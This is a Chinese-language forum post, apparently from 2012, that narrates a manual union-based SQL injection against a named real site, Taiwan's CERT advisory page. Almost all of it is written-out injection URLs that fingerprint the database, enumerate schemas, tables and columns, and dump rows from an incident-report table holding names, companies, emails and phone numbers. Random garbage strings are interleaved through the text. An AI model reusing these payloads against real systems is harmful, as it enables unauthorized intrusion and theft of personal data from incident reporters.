1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
2 f( w/ O- \& @( j5 }2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解9 c. J7 D2 ]% G; }' X- V
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
8 j, j' u, ^! b( d* b3 x& j/ }3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--6 u1 Y: K2 V% u- |% Q# F
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。" t2 z6 @% X* a* W; v
4.判断有没有写权限
% P0 r! Q6 W& c% }0 }+ Q) xhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限 Z7 i+ ]! u. \
没办法,手动猜表啦% H; Q% {. [: v. ^
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,17 h1 x" u6 V9 u4 I% B
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下+ b$ J7 O0 ^7 M% k
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
9 L% \9 Z! r3 y3 r; Q成功查出所有数据库,国外的黑客就是不一般。数据库如下:' ~8 K9 a( i6 X% `% h; S% ~; O
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
( F1 b5 P5 E2 L1 r7 k4 n+ J9 I6.爆表,爆的是twcert库
4 ^, ]+ Y; w8 `, G7 ~: t4 Khttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--1 ~ [8 x' w* q' _" g
爆出如下表: h; e4 u( R+ a3 l: e
downloadfile,irsys,newsdata,secrpt,secrpt_big5
6 @0 N. _9 i9 ?1 t7.爆列名,这次爆的是irsys表/ Z. F; `8 d0 L/ B# N/ s1 Q
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--* B& W6 E2 D9 y6 ?! ^1 ]6 ^5 E) j7 q
爆出如下列
$ a1 B& b6 o* _" j+ Fir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
; I: L% \6 n6 x- i: p8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
) r5 l% c5 |* Z0 [; y- Ohttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
8 R9 g+ P/ G7 d* _; r返回是3,说明每个列里有3个地段+ @7 L0 U2 q- c- M7 o
9.爆字段内容# g& [( ^+ @0 ]! ]$ \0 B
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
+ p; s8 s6 x+ v! h' a爆出name列的第一个字段的内容, b: X& i, t6 B# `8 C& h
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--% ]: ^: Z! V4 N' u6 l6 T5 c7 z
爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对